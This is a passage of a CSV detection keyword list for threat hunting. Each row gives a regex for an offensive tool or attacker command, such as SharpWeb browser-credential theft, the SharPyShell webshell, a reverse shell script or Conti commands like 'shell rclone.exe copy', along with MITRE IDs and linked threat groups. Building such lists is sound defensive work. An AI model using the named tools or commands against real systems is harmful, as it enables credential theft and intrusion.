-*",".{0,1000}SharpWeb\.exe\s\-.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","59250" "*SharpWebManager.cs*",".{0,1000}SharpWebManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59251" "*SharpWebServer.exe*",".{0,1000}SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59252" "*SharpWifiGrabber*",".{0,1000}SharpWifiGrabber.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59253" "*SharpWifiGrabber.exe*",".{0,1000}SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59254" "*sharpwmi action=*",".{0,1000}sharpwmi\saction\=.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59255" "*SharpWMI.exe action=*",".{0,1000}SharpWMI\.exe\saction\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59256" "*SharpWMI.exe*",".{0,1000}SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59257" "*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59258" "*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59259" "*SharpWmiManager*",".{0,1000}SharpWmiManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 
4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59260" "*sharpwmi-N*.exe*",".{0,1000}sharpwmi\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59261" "*SharpWSManWinRM.exe*",".{0,1000}SharpWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","59262" "*sharpwsus locate*",".{0,1000}sharpwsus\slocate.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59263" "*SharpWSUS*",".{0,1000}SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - 
TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59264" "*SharpWSUS.*",".{0,1000}SharpWSUS\..{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","59265" "*SharPyShell Helper Commands:*",".{0,1000}SharPyShell\sHelper\sCommands\:.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59266" "*SharPyShell*",".{0,1000}SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59267" "*sharpyshell.aspx*",".{0,1000}sharpyshell\.aspx.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59268" 
"*SharPyShell.py*",".{0,1000}SharPyShell\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59269" "*SharPyShell_Test.ps1*",".{0,1000}SharPyShell_Test\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59270" "*SharPyShellPrompt.py*",".{0,1000}SharPyShellPrompt\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","59271" "*SharpZeroLogon*",".{0,1000}SharpZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","59272" "*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59273" "*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","59274" "*SharpZippo.exe*",".{0,1000}SharpZippo\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - 
APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z","59275" "*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59276" "*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59277" "*shehzade/peeping-tom*",".{0,1000}shehzade\/peeping\-tom.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","1","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","59278" "*shell 'cmd.exe /c*",".{0,1000}shell\s\'cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59279" "*shell net group *Domain Computers* /domain*",".{0,1000}shell\snet\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59280" "*shell net localgroup administrators*",".{0,1000}shell\snet\slocalgroup\sadministrators.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59281" "*shell nltest /dclist*",".{0,1000}shell\snltest\s\/dclist.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59282" "*shell rclone.exe copy *",".{0,1000}shell\srclone\.exe\scopy\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59283" "*shell should now be running as nt authority\\system!*",".{0,1000}shell\sshould\snow\sbe\srunning\sas\snt\sauthority\\\\system!.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","59284" "*shell whoami /user*",".{0,1000}shell\swhoami\s\/user.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","59285" "*shell whoami*",".{0,1000}shell\swhoami.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59286" "*shell.exe -s payload.txt*",".{0,1000}shell\.exe\s\-s\spayload\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","59287" "*shell_shocked*.js*",".{0,1000}shell_shocked.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59288" "*shell_shocked*.rb*",".{0,1000}shell_shocked.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59289" "*shell_smbadmin -Targets *",".{0,1000}shell_smbadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59290" "*shell_startup_files_modification.py*",".{0,1000}shell_startup_files_modification\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","59291" "*shell_tknadmin -Domain * -DomainController *",".{0,1000}shell_tknadmin\s\-Domain\s.{0,1000}\s\-DomainController\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59292" "*shell_tknadmin -Targets *",".{0,1000}shell_tknadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59293" "*shell_wmiadmin -Domain * -DomainController*",".{0,1000}shell_wmiadmin\s\-Domain\s.{0,1000}\s\-DomainController.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59294" "*Shell3er.ps1*",".{0,1000}Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","59295" "*shellc *.bin 